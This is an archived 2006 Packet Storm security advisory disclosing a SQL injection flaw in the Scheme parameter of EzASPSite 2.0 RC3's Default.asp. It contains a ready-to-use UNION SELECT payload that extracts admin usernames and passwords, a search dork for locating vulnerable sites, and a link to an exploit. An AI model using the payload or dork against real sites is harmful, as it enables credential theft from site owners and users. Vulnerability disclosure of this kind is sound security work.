EzASPSiteSQL.txt

2006-04-01T00:00:00
ID PACKETSTORM:45098
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-04-01T00:00:00

Description

                                        
                                            `  
--Security Report--  
Advisory: EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 29/03/06 21:33 PM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: nukedx@nukedx.com  
Web: http://www.nukedx.com  
}  
---  
Vendor: EzASPSite (http://www.ezaspsite.com)  
Version: 2.0 RC3 and prior versions must be affected.  
About: Via this method remote attacker can inject arbitrary SQL queries to   
Scheme parameter in Default.asp  
Level: Critical  
---  
How&Example:   
GET -> http://[victim]/[EZASPDir]/Default.asp?Scheme=[SQL]  
EXAMPLE ->   
  
http://[victim]/[EZASPDir]/Default.asp?Scheme=-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,  
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',  
0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1  
with this examples remote attacker can leak speficied users login information   
from database.  
---  
Timeline:  
* 29/03/2006: Vulnerability found.  
* 29/03/2006: Contacted with vendor and waiting reply.  
---  
Exploit:  
http://www.nukedx.com/?getxpl=22  
---  
Dorks: "Powered By EzASPSite v2.0 RC3"  
---  
Original advisory can be found at: http://www.nukedx.com/?viewdoc=22  
`